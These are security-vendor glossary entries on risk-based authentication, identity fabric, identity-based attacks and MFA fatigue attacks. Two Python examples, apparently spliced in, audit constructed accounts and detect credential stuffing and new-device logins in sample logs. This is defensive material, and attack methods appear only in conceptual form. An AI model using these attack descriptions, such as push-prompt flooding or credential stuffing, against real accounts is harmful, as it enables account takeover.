More recently, risk-based authentication (RBA) has emerged as an adaptive method that evaluates each login attempt based on the level of risk. RBA utilizes artificial intelligence and machine learning to analyze dozens of variables like IP address, geolocation, time of access and more to detect anomalies that could indicate fraud. If the login appears risky, the user may be prompted for additional verification like a one-time code sent to their phone. However, if the login is from a recognized device and location, the user can proceed without interruption.

RBA offers a number of benefits over traditional authentication techniques:

- It is more convenient for users by reducing unnecessary prompts for additional verification. Low-risk logins proceed seamlessly while high-risk logins trigger further authentication.
- It helps prevent fraud by detecting suspicious login attempts that may indicate account takeover or other malicious activity. RBA uses machine learning models that improve over time as more data is analyzed.
- It provides a better overall user experience by balancing security and convenience. Users are only prompted for additional verification when truly necessary based on the level of risk.
- It allows security teams to customize authentication policies based on the sensitivity of data or applications. More sensitive systems may require additional verification for even moderately risky logins.

RBA is a promising new approach to authentication that leverages AI and risk analysis for adaptive security. As threats continue to evolve, RBA will play an increasingly important role in protecting online accounts and sensitive data.

### The Benefits of Risk-Based Authentication

RBA provides several advantages over static authentication methods.
First, it improves the user experience by reducing friction for low-risk logins. Users don’t have to enter additional credentials or complete extra steps if the system determines they are logging in from a recognized device or location during normal hours. This convenience encourages user adoption of authentication methods and limits frustration.

Second, RBA strengthens security where needed by requiring stronger authentication for higher-risk logins, such as from an unknown device or location or at an unusual time of day. The additional authentication, which may include a security code sent to the user’s phone or an app notification, helps verify the user’s identity and reduces the chances of fraud. Stronger authentication only kicks in when the risk level warrants it, balancing security and usability.

Finally, RBA saves organizations time and money. Help desk resources aren’t drained by users who have been unnecessarily locked out of their accounts. And by reserving the strongest authentication for risky logins, companies can avoid implementing overly stringent controls across the board, which reduces costs. RBA also cuts down on false positives, minimizing wasted efforts investigating legitimate user logins flagged as anomalous.

RBA offers a smart, tailored approach to authentication that helps companies optimize security, user experience, and costs. By focusing additional controls where risks are highest, organizations can achieve the right level of authentication based on need, not an arbitrary one-size-fits-all policy.

### Implementing a Risk-Based Authentication Solution

Implementing a risk-based authentication solution requires careful planning and execution. To begin, organizations must identify their most critical data, systems, and resources. A risk assessment helps determine vulnerabilities and the likelihood of compromise. Understanding potential threats and impacts allows companies to focus security controls where needed most.
A successful risk-based authentication deployment relies on quality data and advanced analytics. Sufficient historical data about users, access patterns, locations, and devices provides a baseline for normal behavior. Machine learning models can then detect meaningful deviations to calculate accurate risk scores. However, risk scoring models require ongoing tuning as false positives and false negatives emerge. Data scientists must continually retrain models to minimize authentication errors.

#### Integration with Existing Systems

Risk-based authentication solutions must integrate with a company's existing identity and access management infrastructure. This includes connecting to directories like Active Directory to access user profiles and roles. Integration with a security information and event management (SIEM) platform provides additional data to inform risk scoring. Application program interfaces (APIs) allow risk-based authentication services to communicate with and enhance native login systems.

To implement risk-based authentication, organizations need a dedicated team to manage the solution. Data scientists develop and optimize risk scoring models. Security analysts monitor the system, address alerts, and remediate issues. Administrators maintain the underlying infrastructure and integration with existing systems. With the proper resources and planning in place, risk-based authentication can provide an adaptive security control to protect critical data and resources.

### The Future of Risk-Based Authentication

Risk-based authentication is an evolving field that will likely see continued advancements to strengthen security while improving user experience. Some possibilities on the horizon include:

- Biometrics and behavior analytics. Biometric methods like fingerprint, face, and voice recognition are becoming more sophisticated and ubiquitous, especially on mobile devices.
Analyzing a user’s typing speed, swiping patterns, and other behaviors may also enhance risk scoring. Multi-factor authentication using biometrics and behavior analytics could provide very strong protection.
- Artificial intelligence and machine learning. AI and machine learning are being applied to detect increasingly complex patterns that indicate fraud. As systems collect more data over time, machine learning algorithms can become extremely accurate at spotting anomalies. AI may also be used to dynamically adjust risk scores and select authentication methods based on the latest threats.
- Decentralized and blockchain-based systems. Some companies are developing authentication systems that do not rely on a central repository of user data which could be a target for hackers. Blockchain technology, which powers cryptocurrencies like Bitcoin, is an example of a decentralized system that can be used for authentication. Users could have more control over their digital identities and personal information.

While risk-based authentication is not a silver bullet, continuous progress in these and other areas will make accounts even more impervious to takeover and help prevent various types of fraud. As methods of authentication and risk analysis advance, accounts should become very difficult for attackers to compromise without the proper credentials or behavior patterns. The future of risk-based authentication looks promising in the never-ending battle against cyber threats. Overall, risk-based authentication will likely continue maturing into a multifactor solution that is both highly secure and seamless for end users to navigate.

### Conclusion

Implementing a comprehensive risk-based authentication strategy helps ensure user access is authenticated to an appropriate level of confidence, enabling secure access while also maximizing usability and productivity.
With risk-based authentication, organizations can apply "just enough, just in time" authentication tailored to the unique risk factors of each access scenario.

---

## Identity Fabric

- Published: 2023-12-27
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-fabric/

A unified, interconnected IAM architecture that dismantles siloed identity systems to centrally coordinate provisioning, authentication, and access governance across hybrid environments.

Identity fabric is a new approach to identity and access management (IAM) that aims to overcome the challenges posed by existing silos between various IAM and identity security solutions. Traditional IAM solutions often involve disparate systems that may not communicate effectively with each other, leading to inefficiencies and potential security vulnerabilities. Identity fabric seeks to provide a unified and interconnected framework for managing identities across an organization.

An Identity Fabric solution delivers a holistic view of user identities, access rights, and account activities. It streamlines provisioning, authentication, and authorization of users and their access to resources across on-premises and cloud environments.

With an Identity Fabric, organizations can take a coordinated approach to identity governance. User lifecycle events like hiring, termination, promotion or role changes can be managed centrally. Consistent identity access policies and controls are applied across systems, reducing risk.

An Identity Fabric also enables advanced identity analytics and intelligence. User behaviors and access patterns are monitored to detect anomalies that could indicate compromised accounts or insider threats. Analytics provide visibility into how access rights accumulate over time and where privileges have spread broadly, so organizations can remediate excessive access.
### How Identity Fabric Works to Protect User Identities

Identity Fabric is an identity and access management (IAM) architecture that integrates multiple IAM solutions into a unified system. It enables organizations to centrally manage user identities and control access to resources across environments such as cloud services, Active Directory or other directory services. The key components of an Identity Fabric include:

- Identity management systems - Systems that create, store and manage user identities and access. This includes solutions for managing passwords, multi-factor authentication, user profiles, roles and permissions.
- Access management - Controls and monitors user access to resources across the organization. It ensures users have appropriate access based on their job function and enforces security policies.
- User authentication - Verifies users are who they claim to be when accessing resources. This includes passwords, multi-factor authentication methods like biometrics, security keys and one-time passwords.
- User provisioning - Automates the process of creating, updating and deactivating user accounts across all connected systems and applications based on a single source of truth.
- Audit and compliance - Monitors user access and activity to detect anomalies, ensure compliance with regulations and prevent violations of security policies. It provides logging, monitoring and reporting capabilities.
- Federated identity - Allows identities from one domain to be used to access resources in another domain. It provides single sign-on across security domains through secure identity federation standards like SAML, OpenID Connect and SCIM.

By consolidating identity data and unifying identity management processes, Identity Fabric reduces risks associated with “identity sprawl” – the proliferation of duplicate, outdated or unauthorized user accounts spread across IAM solutions.
It helps ensure only authorized individuals have access to resources, and access is removed promptly when no longer needed.

### Benefits of Implementing Identity Fabric for Identity Protection

Implementing an Identity Fabric provides several key benefits for organizations looking to enhance their identity protection and streamline access management.

#### Enhanced Security and Compliance

An Identity Fabric helps organizations strengthen security by providing a centralized access control system. It enables role-based access control, multi-factor authentication, and user provisioning to ensure only authorized users gain access to systems and data. This also aids in meeting compliance regulations like GDPR and CCPA by facilitating data access transparency and consent.

#### Improved Scalability

As organizations adopt more applications and services, managing users and access across systems becomes increasingly complex. An Identity Fabric provides a single platform to manage access across all applications, whether on-premises or in the cloud. This simplifies access management at scale and reduces the resources required to onboard new applications and manage users.

#### Optimized User Experience

With an Identity Fabric, users benefit from a seamless experience across systems. They only need to sign in once to access everything they need to do their jobs. The Identity Fabric automatically provisions and deprovisions access as needed based on a user's role. This minimizes disruption for users when responsibilities change or they join/leave the organization.

#### Increased Operational Efficiency

For IT teams, an Identity Fabric reduces manual work by automating access management workflows. This includes automated provisioning/deprovisioning, access reviews, and role changes. Teams gain a centralized view of access across the organization, enabling them to easily monitor for issues, make adjustments, and ensure compliance.
Overall, an Identity Fabric allows IT teams to focus on high-priority, strategic initiatives rather than repetitive access management tasks.

### Implementing Identity Fabric for Enhanced Security

To implement an Identity Fabric architecture, an organization must have a thorough understanding of its data, applications, devices, and users. An Identity Fabric weaves together disparate identity systems into a single, integrated identity plane across the IT environment.

The first step is conducting an inventory of digital identities across systems. This includes user accounts, service accounts, credentials, authentication methods, and access policies. With a comprehensive inventory, organizations can map identities and access, identify redundant or obsolete accounts, and spot potential vulnerabilities.

Next, organizations determine a strategy for integrating identities. This may include consolidating redundant accounts, implementing strong authentication, and employing automated provisioning and deprovisioning. Single sign-on (SSO) and multi-factor authentication (MFA) are commonly used to strengthen identity security. SSO provides one set of login credentials to access multiple applications. MFA adds an extra layer of authentication for logins and transactions.

To build the Identity Fabric, organizations deploy an identity management solution that acts as an identity hub, connecting disparate systems. The identity hub enforces consistent access policies, provides a single pane of glass for identity governance, and employs machine learning and behavioral analysis to detect anomalous activity. With the identity hub in place, organizations can weave in additional capabilities over time, such as privileged access management, identity analytics, and cloud identity federation.

An Identity Fabric enables enhanced visibility and control over identities and access.
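The inventory and review steps described above, as an added example that is not Silverfort's or any vendor's code: accounts from an HR roster, an Active Directory export and a cloud identity provider export are correlated under one identity key, and the review then flags what the Identity Infrastructure entry's compliance list and the access-review practice call for: terminated users whose accounts are still enabled, dormant accounts, cloud accounts without MFA, privileged roles sitting on at-risk accounts, and service accounts with no owner or a departed owner. All records, field names, store names and thresholds are constructed for the example.

```python
"""Added example (not Silverfort's or any vendor's code): building one
inventory from several identity stores and flagging what an access review
should catch.  The HR roster, directory exports, field names and policy
thresholds are all constructed assumptions."""
from collections import defaultdict
from datetime import date
from typing import Dict, List, Tuple

REVIEW_DATE = date(2024, 6, 1)   # assumed date the review runs
DORMANT_AFTER_DAYS = 90          # assumed policy: no sign-in for 90 days = dormant

# Constructed HR roster: the source of truth for who is still employed.
HR = [
    {"employee_id": "E100", "email": "alice@example.com", "status": "active"},
    {"employee_id": "E101", "email": "bob@example.com",   "status": "terminated"},
    {"employee_id": "E102", "email": "carol@example.com", "status": "active"},
]

# Constructed Active Directory export (human users and service accounts).
AD = [
    {"sam": "alice", "email": "alice@example.com", "type": "user", "enabled": True, "last_logon": date(2024, 5, 30)},
    {"sam": "bob",   "email": "bob@example.com",   "type": "user", "enabled": True, "last_logon": date(2024, 1, 15)},
    {"sam": "carol", "email": "carol@example.com", "type": "user", "enabled": True, "last_logon": date(2024, 5, 29)},
    {"sam": "svc_backup", "email": None, "type": "service", "enabled": True, "last_logon": date(2024, 5, 31), "owner": "bob@example.com"},
    {"sam": "svc_legacy", "email": None, "type": "service", "enabled": True, "last_logon": date(2023, 11, 2), "owner": None},
]

# Constructed cloud identity provider export (note the mixed-case email).
CLOUD_IDP = [
    {"email": "Alice@Example.com", "mfa_enrolled": True,  "last_login": date(2024, 5, 31), "roles": ["user"]},
    {"email": "bob@example.com",   "mfa_enrolled": False, "last_login": date(2024, 1, 10), "roles": ["global-admin"]},
    {"email": "carol@example.com", "mfa_enrolled": False, "last_login": date(2024, 5, 30), "roles": ["user"]},
]

Finding = Tuple[str, str, str]   # (identity key, account reference, finding code)


def identity_key(email, sam=None) -> str:
    """Correlate accounts by normalised email; a service account without an
    email gets its own key so it is reviewed rather than silently dropped."""
    return email.lower() if email else f"svc:{sam}"


def build_inventory() -> Dict[str, List[Tuple[str, dict]]]:
    """One entry per identity, listing every account found for it in any store."""
    inventory = defaultdict(list)
    for acct in AD:
        inventory[identity_key(acct["email"], acct["sam"])].append(("ad", acct))
    for acct in CLOUD_IDP:
        inventory[identity_key(acct["email"])].append(("cloud", acct))
    return inventory


def review(inventory) -> List[Finding]:
    """Apply the review rules to every account and return the findings."""
    active = {h["email"].lower() for h in HR if h["status"] == "active"}
    findings: List[Finding] = []
    for ident, accounts in inventory.items():
        for source, acct in accounts:
            ref = f"{source}:{acct.get('sam') or acct['email'].lower()}"
            codes = []
            enabled = acct.get("enabled", True)
            if acct.get("type") == "service":
                owner = acct.get("owner")
                if owner is None:
                    codes.append("service-account-no-owner")
                elif owner.lower() not in active:
                    codes.append("service-account-owner-terminated")
            elif enabled and ident not in active:
                codes.append("orphaned-account")          # terminated user, still enabled
            last_seen = acct.get("last_logon") or acct.get("last_login")
            if enabled and (REVIEW_DATE - last_seen).days > DORMANT_AFTER_DAYS:
                codes.append("dormant")
            if source == "cloud":
                if not acct["mfa_enrolled"]:
                    codes.append("mfa-not-enrolled")
                privileged = any("admin" in r for r in acct["roles"])
                if privileged and (not acct["mfa_enrolled"] or ident not in active):
                    codes.append("privileged-role-at-risk")
            findings.extend((ident, ref, c) for c in codes)
    return findings


if __name__ == "__main__":
    for ident, ref, code in review(build_inventory()):
        print(f"{ident:22} {ref:28} {code}")
```

Correlating on a normalised email is what lets the review see that `Alice@Example.com` in the cloud directory and `alice` in AD are one person with two accounts; without that step each store would be reviewed in isolation and the terminated user's still-enabled admin role in the cloud directory would not be connected to his HR status.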
It reduces risks from compromised credentials, insider threats, and external attacks by eliminating identity silos, strengthening authentication, and using advanced analytics. For organizations pursuing digital transformation, an Identity Fabric is essential for managing identities at scale, ensuring compliance, and maintaining a robust security posture. With a mature Identity Fabric, organizations can make identities the foundation for a zero trust security model.

### Identity Fabric and Zero-Trust Architecture

Identity Fabric builds a strong, multifactor foundation for identity assurance and access management. Paired with Zero Trust architecture, it allows organizations to securely enable digital transformation, support remote workforces at scale and gain visibility across complex IT ecosystems.

The Zero Trust model operates on the principle of “never trust, always verify.” It requires rigorous identity verification for every user and device trying to access resources. Identity Fabric provides the robust, continuous authentication and authorization Zero Trust demands. Its AI-powered identity assessments enable granular, contextual access policies based on the risk levels of users and devices. This helps organizations balance security and user experience.

### Identity Fabric vs. Identity Infrastructure

Identity Fabric is a more holistic and integrated approach to managing identities across an organization. It encompasses various identity services and solutions, providing a unified and consistent identity experience across all platforms and environments. The idea is to weave together different identity technologies (like authentication, authorization, and user management) into a cohesive, scalable, and flexible framework. This approach facilitates better user experience, easier management, and enhances security.

On the other hand, the term Identity Infrastructure refers to the underlying framework or systems that support identity management within an organization.
It includes the hardware, software, policies, and procedures necessary for creating, maintaining, and managing digital identities and access rights. Identity Infrastructure is the foundation on which identity segmentation and the identity fabric are built and operationalized.

### Identity Fabric vs. Converged Identity

While related, Identity Fabric and converged identity are distinct concepts. Converged identity refers to bringing separate user stores together into a single identity repository. Identity Fabric takes this a step further by connecting and correlating identities across the entire IT infrastructure. An Identity Fabric builds on top of a converged identity system by layering on components for managing access, authentication, provisioning and security. In short, a converged identity is a prerequisite for building an Identity Fabric.

Identity Fabric provides a comprehensive approach to identity management that spans across organizations’ networks, data centers, clouds, applications, and devices. It gives security teams a holistic view of users’ identities and access, enabling stronger security, governance and compliance. By connecting identities across IT systems, Identity Fabric reduces redundancy, improves productivity and delivers a better user experience.

### Conclusion

With the rapid adoption of cloud computing and mobile technologies, identity has become one of the most critical components of cybersecurity. As organizations move away from the traditional network perimeter and embrace a zero-trust security model, identity has become the new perimeter. An identity fabric stitches together disparate identity systems into a single cohesive framework, providing a holistic view of users, their access, and their entitlements across the organization. For cybersecurity and IT professionals, understanding identity fabric and how to implement it is crucial to navigating today's decentralized networks and protecting critical data and systems.
---

## Identity-Based Attacks

- Published: 2023-12-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-based-attacks/

Cyberattacks that exploit compromised credentials to misuse legitimate authentication paths, enabling attackers to evade detection and access both on‑premises and cloud resources.

Identity-based attacks make use of users’ compromised credentials for malicious access. They differ from malware-based attacks in that they employ the legitimate authentication process for accessing resources, with no malicious code required. Some expand the definition to also include the attack stages that facilitate this unauthorized access, such as credential compromise and privilege escalation. Identity-based attacks can target both human and non-human identities.

The goal of identity-based attacks is to access on-prem and cloud resources by impersonating legitimate users. Once threat actors have stolen login information, they can masquerade as authorized users and gain access to resources. These attacks are difficult to detect since the compromised accounts already have permission to access systems and data.

Identity-based attacks continue to grow in sophistication and scale. Organizations must implement strong security controls like multi-factor authentication, employee education, and account monitoring to help reduce risks from these threats. With vigilance and a proactive identity security posture, the impact of identity-based attacks can be minimized.

### How Identity-Based Attacks Work

Identity-based attacks target individuals by compromising their personal data and digital identities. Hackers employ various techniques and vectors to steal usernames, passwords, social security numbers, and other sensitive information that can then be used to impersonate victims for financial gain or other malicious purposes.
#### Phishing

Phishing is a common tactic where attackers send fraudulent emails or text messages posing as a legitimate company or service to trick recipients into providing login credentials, account numbers, or installing malware. Spearphishing targets specific individuals, appearing to come from someone they know. Whaling targets high-profile executives.

#### Keylogging

Keylogging software secretly tracks the keys pressed on a keyboard, recording usernames, passwords, credit card numbers, and other sensitive data. Keyloggers can be installed by phishing emails, infected external storage devices, or by exploiting software vulnerabilities.

#### Social Engineering

Social engineering aims to manipulate people into divulging confidential information or performing actions that enable system access. Attackers may impersonate IT support staff, claim there is a technical issue that requires account access or trick victims into clicking malicious links by appearing to come from a friend or colleague.

#### Credential Stuffing

Credential stuffing uses automated tools to test stolen username and password combinations on different websites and services. Billions of compromised credentials from major data breaches are available on the dark web. Hackers employ credential stuffing to find accounts where people reuse the same login information.

#### Biometric Spoofing

As multi-factor authentication becomes normalized, biometric spoofing, where attackers falsify biometric data to access privileged accounts, has also emerged as an attack vector.

### Why Are Identity-Based Attacks Important?

Identity-based attacks target an individual's personally identifiable information (PII) and login credentials. These attacks are significant because they can have major impacts on both individuals and organizations. For individuals, identity theft and account takeovers can lead to financial loss, damaged credit, and compromised personal information.
Criminals use stolen identities and accounts to make unauthorized purchases, apply for loans, file fraudulent tax returns, and more.

For organizations, identity-based attacks pose risks to customer data, intellectual property, and financial assets. Hackers frequently target corporate accounts and networks to gain access to sensitive data and funds. Successful attacks can undermine consumer trust and negatively impact a company's reputation and brand.

Once attackers gain initial access, they will try to move laterally across networks to access additional systems and accounts. They leverage the permissions and trust of the originally compromised account to access more sensitive data and gain greater control. Lateral movement is an advanced technique that often requires stealth to avoid detection.

Regulations like the General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA) hold organizations responsible for safeguarding personal data and responding to identity-based attacks. Failure to comply with these regulations can result in significant financial penalties.

### Protecting Against Identity-Based Attacks

Protecting against identity-based attacks requires a multi-pronged approach. Organizations should implement comprehensive security awareness training to educate employees about phishing emails, social engineering tactics, and strong password practices.

#### Multi-factor Authentication

Multi-factor authentication (MFA) adds an extra layer of protection for user accounts and systems. When MFA is enabled, users must provide two or more verification methods to log in, such as a password and a security code sent to their mobile device. This extra layer makes it difficult for attackers to gain access even if they have the password. It can also mitigate the damage of phishing attacks by requiring a second form of identification that the attacker is less likely to have.
Repeated login attempts (as in brute-force attacks) are also often thwarted by MFA, as the attacker would need more than just a password to gain access.

#### AI-Powered Detection

Artificial intelligence and machine learning can help detect anomalous login attempts and spot compromised accounts. AI systems analyze huge volumes of data to establish normal behavior patterns for users and systems. They can then flag unusual activity, like logins from unknown devices or locations, excessive failed login attempts, or changes to account information. AI and ML systems get "smarter" over time by incorporating new data into their models.

#### Incident Response Planning

In the event of an identity-based attack, an effective incident response plan is critical. The plan should outline steps for securing accounts and systems, investigating the source and scope of the attack, and remediating any damage. It should also include procedures for notifying affected customers or business partners if their data has been compromised. Post-incident reviews help identify areas of improvement for security controls and response strategies.

#### Ongoing Monitoring

Continuous monitoring of networks, systems, and user accounts is key to defending against identity theft and account takeover. Monitoring solutions use a combination of log analysis, network traffic inspection, and user behavior analytics to detect threats in real time. When malicious activity is uncovered, security teams receive alerts so they can quickly contain the attack and avoid data loss or system disruption. Regular reviews of access logs, permissions, and user profiles also help ensure that accounts and data are properly secured.

With a robust set of security controls, vigilant monitoring, and adaptive technologies like AI, organizations can strengthen their defenses against the evolving techniques used in identity-based cyber attacks.
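The two monitoring signals named above (excessive failed logins and logins from unknown devices or locations) can be expressed as simple log-analysis rules. The following is an added example written for this glossary entry; it is not Silverfort code, and the JSON-lines log format, field names, thresholds and window sizes are assumptions. It detects a credential-stuffing pattern (one source address failing against many distinct accounts in a short window) and a successful login from a device/location pair the account has never used, then links the two when the anomalous login comes from a flagged source.

```python
"""Rule-based detection over authentication logs (added example, constructed data)."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample auth events, one JSON object per line (not real data).
SAMPLE_LOG = """\
{"ts": "2024-05-01T08:00:00Z", "user": "alice", "src_ip": "10.0.0.5", "device": "alice-laptop", "country": "DE", "result": "success"}
{"ts": "2024-05-01T08:05:00Z", "user": "bob", "src_ip": "10.0.0.9", "device": "bob-laptop", "country": "DE", "result": "success"}
{"ts": "2024-05-01T09:00:01Z", "user": "alice", "src_ip": "203.0.113.7", "device": "unknown", "country": "US", "result": "failure"}
{"ts": "2024-05-01T09:00:02Z", "user": "bob", "src_ip": "203.0.113.7", "device": "unknown", "country": "US", "result": "failure"}
{"ts": "2024-05-01T09:00:03Z", "user": "carol", "src_ip": "203.0.113.7", "device": "unknown", "country": "US", "result": "failure"}
{"ts": "2024-05-01T09:00:04Z", "user": "dave", "src_ip": "203.0.113.7", "device": "unknown", "country": "US", "result": "failure"}
{"ts": "2024-05-01T09:00:05Z", "user": "erin", "src_ip": "203.0.113.7", "device": "unknown", "country": "US", "result": "failure"}
{"ts": "2024-05-01T09:00:06Z", "user": "bob", "src_ip": "203.0.113.7", "device": "unknown", "country": "US", "result": "success"}
{"ts": "2024-05-01T10:00:00Z", "user": "alice", "src_ip": "10.0.0.5", "device": "alice-laptop", "country": "DE", "result": "success"}
"""


def parse_events(text):
    """Parse JSON lines into dicts with a timezone-aware datetime, sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        events.append(ev)
    events.sort(key=lambda e: e["ts"])
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=5), min_users=5):
    """One source IP failing against >= min_users distinct accounts inside `window`.

    Sliding window per IP; reports each IP at most once (first time it crosses).
    """
    failures = defaultdict(list)
    for ev in events:
        if ev["result"] == "failure":
            failures[ev["src_ip"]].append(ev)
    alerts = []
    for ip, evs in failures.items():
        left = 0
        for right, ev in enumerate(evs):
            while ev["ts"] - evs[left]["ts"] > window:
                left += 1
            users = {e["user"] for e in evs[left:right + 1]}
            if len(users) >= min_users:
                alerts.append({"rule": "credential_stuffing", "src_ip": ip,
                               "distinct_users": len(users), "ts": ev["ts"]})
                break
    return alerts


def detect_new_device_or_location(events):
    """Successful login from a (device, country) pair not in the user's baseline.

    The baseline is built from earlier successful logins in the same stream, so the
    first login ever seen for a user is not flagged (there is nothing to compare to).
    """
    baseline = defaultdict(set)
    alerts = []
    for ev in events:
        if ev["result"] != "success":
            continue
        key = (ev["device"], ev["country"])
        seen = baseline[ev["user"]]
        if seen and key not in seen:
            alerts.append({"rule": "new_device_or_location", "user": ev["user"],
                           "src_ip": ev["src_ip"], "device": ev["device"],
                           "country": ev["country"], "ts": ev["ts"]})
        seen.add(key)
    return alerts


def run_detections(text=SAMPLE_LOG):
    """Run both rules and mark anomalous logins that came from a stuffing source."""
    events = parse_events(text)
    stuffing = detect_credential_stuffing(events)
    anomalies = detect_new_device_or_location(events)
    flagged_ips = {a["src_ip"] for a in stuffing}
    for a in anomalies:
        a["likely_takeover"] = a["src_ip"] in flagged_ips
    return {"credential_stuffing": stuffing, "anomalies": anomalies}


if __name__ == "__main__":
    for rule, hits in run_detections().items():
        for hit in hits:
            print(rule, hit)
```

In the constructed sample the stuffing source is reported once (five distinct accounts within five minutes), and bob's later success from that same source on an unknown device is flagged as a likely takeover rather than just a new-device notice, which is the correlation a responder wants.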
But constant awareness and education across the workforce are equally important for thwarting social engineering attempts and other scams aimed at stealing login credentials or sensitive data.

### Conclusion

As this article has shown, identity-based attacks are a serious threat in today's digital landscape. By compromising login credentials or spoofing trusted identities, cybercriminals can gain access to sensitive data and systems to launch further attacks. Identity-based attacks are constantly evolving, but with vigilance, education and adaptive defensive strategies, their impact can be minimized. Continued progress in biometrics, behavior analytics, and other authentication methods may also help curb these threats in the coming years.

---
- Published: 2023-12-11
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/mfa-fatigue/

A vulnerability where users become overwhelmed by constant multi-factor authentication prompts, potentially leading to inadvertent approval of fraudulent access attempts.

Multi-factor authentication (MFA) fatigue refers to the frustration and annoyance users experience when constantly entering additional login credentials, such as one-time passwords sent via text message or an authentication app. MFA fatigue often leads users to disable MFA controls, creating security risks.

As cyberattacks become more sophisticated, MFA has become crucial for account security. However, entering codes each time a user logs in or performs sensitive actions can be tedious and disruptive. This repetitious process causes MFA fatigue and leads users to perceive MFA as an obstacle rather than a safeguard.

Some of the factors contributing to MFA fatigue include:

- Frequency of logins and MFA prompts: More logins and prompts lead to greater annoyance.
- Difficulty of MFA process: Complex passwords, multiple steps, and system errors intensify frustration.
- Lack of understanding: Users who don't grasp the security benefits of MFA may view it as a nuisance.
- Inconvenience: MFA that disrupts workflow or requires switching between devices leads to higher fatigue.

To alleviate MFA fatigue, organizations should implement adaptive authentication, offer a choice of easy-to-use MFA methods, limit prompts when possible, and educate users about MFA's importance for account security. With the right approach, MFA can provide robust protection without significantly impacting user experience or productivity.

### What is Multi-Factor Authentication (MFA)?

Multi-factor authentication (MFA) is a security system that requires more than one method of authentication from independent categories of credentials to verify a user's identity for a login or other transaction. MFA provides an extra layer of security for user accounts and data, reducing the risk of unauthorized access.

MFA typically involves a combination of:

- Something you know, like a password or PIN
- Something you have, such as a security key or code generator app
- Something you are, such as a fingerprint or face ID

By requiring multiple factors, MFA helps ensure that stolen or guessed passwords are not enough to access an account. If one factor is compromised, the attacker still needs the other(s) to authenticate. This multifactor approach drastically reduces the risk of account takeover and fraud.

The most common MFA methods are:

- SMS text message codes: A temporary code sent to the user's phone which must be entered along with the password.
- Authenticator apps: An app like Google Authenticator or Duo generates time-based one-time passwords (TOTP).
- Security keys: A physical USB key or Bluetooth device must be tapped or inserted to authenticate.
- Biometrics: Technologies like fingerprint, face, or voice recognition provide "something you are" authentication.

To combat MFA fatigue, organizations should choose strong yet user-friendly MFA methods, provide education on MFA's importance, and implement MFA gradually to allow users to adjust to the changes.
With widespread adoption, MFA can significantly strengthen account security.

### Causes of MFA Fatigue in Organizations

Multi-factor authentication (MFA) fatigue occurs when users become frustrated or tired of the extra steps required for MFA and look for ways around it. There are a few main causes of MFA fatigue in organizations:

MFA can be perceived as inconvenient by some users, especially when frequently prompted for authentication. The extra login steps, like entering a code sent via text message or using an authentication app, can become tiresome over time and with frequent use. This can lead users to view MFA as an annoyance rather than a helpful security measure.

A poor MFA user experience contributes to fatigue. If the MFA process is confusing, time-consuming, or prone to errors, users will grow increasingly frustrated with it. The MFA methods and tools selected by an organization play a significant role in the overall user experience. More seamless, user-friendly MFA options may help reduce fatigue.

Lack of MFA understanding leads to pushback. When users do not fully understand why MFA is necessary and how it benefits security, they are more likely to view it as a hassle. Educating users about the value of MFA in protecting accounts and data can help gain buy-in and adoption, decreasing fatigue over the long run.

To limit MFA fatigue, organizations should implement user-friendly MFA tools, provide education on MFA benefits, monitor for issues in the MFA process, and consider feedback from users on their experiences. Balancing strong security with an optimal user experience is key to the success of any MFA program. With the proper strategy and support in place, organizations can deploy MFA at scale without substantial fatigue.

### The Consequences of Unaddressed MFA Fatigue

Unmitigated MFA fatigue can have serious ramifications for organizations.
When employees experience high levels of frustration with MFA solutions, they may resort to unsafe workarounds that compromise security. For example, some users may disable MFA controls or share authentication credentials with coworkers to avoid perceived inconveniences, creating vulnerabilities that cybercriminals can exploit through other social engineering attacks.

Prolonged MFA fatigue can also damage employee productivity and morale. The constant interruptions from authentication prompts reduce focus and workflow efficiency. Users who find MFA systems overly tedious or troublesome may come to view them as a hindrance, diminishing their effectiveness. This can foster resentment towards the IT department that implemented the solution.

Furthermore, MFA fatigue poses risks to user experience and customer satisfaction. In workplaces where customers interact directly with MFA systems, a poor user experience can reflect poorly on the organization and damage relationships. Customers expect seamless, hassle-free interactions, and persistent authentication requests fail to meet these expectations.

To mitigate these consequences, organizations must take proactive steps to alleviate and prevent MFA fatigue. Educating users about MFA and security best practices can help address frustration by clarifying the rationale behind the controls. IT teams should also evaluate MFA solutions for usability and look for ways to streamline the user experience, such as by reducing false positives.

### What is an MFA Fatigue Attack?

An MFA Fatigue Attack refers to a type of cyber attack that exploits human weaknesses in multi-factor authentication (MFA) systems. MFA, designed to enhance security by requiring two or more verification factors, can become a vulnerability if users are overwhelmed or fatigued by repeated authentication requests.
Here's a breakdown of how MFA Fatigue Attacks typically work:

- Repeated Authentication Requests: The attacker repeatedly triggers the MFA prompt to a user's device, often through fraudulent login attempts. This can happen at all hours, including during the night or during work hours, leading to repeated notifications on the user's phone or device.
- Exploiting User Fatigue and Frustration: The continuous flood of MFA prompts (such as push notifications) can lead to frustration or fatigue in the targeted user. The user might become desensitized to the alerts, seeing them as a nuisance rather than a security measure.
- User Complies to Stop Alerts: Eventually, hoping to stop the incessant notifications, the user may approve an authentication request. This is often done in a moment of frustration or in an attempt to diagnose the issue, without realizing it's a malicious attack.
- Gaining Unauthorized Access: Once the user approves the MFA request, the attacker gains access to the account or system protected by MFA. This can lead to data breaches, account takeover, or further malicious activities within the network.
- Challenge in Detection and Response: MFA Fatigue Attacks can be challenging to detect because they exploit legitimate features of MFA systems. The attack relies on human error rather than technical vulnerabilities, making traditional security measures less effective.

MFA Fatigue Attacks highlight the importance of not only having robust technical security measures but also educating users about security best practices. Organizations need to be aware of this type of attack and consider implementing strategies to mitigate its effectiveness, such as limiting the number of MFA prompts, providing clear guidance for users on how to respond to unexpected MFA requests, and using adaptive MFA solutions that adjust authentication requirements based on perceived risk.
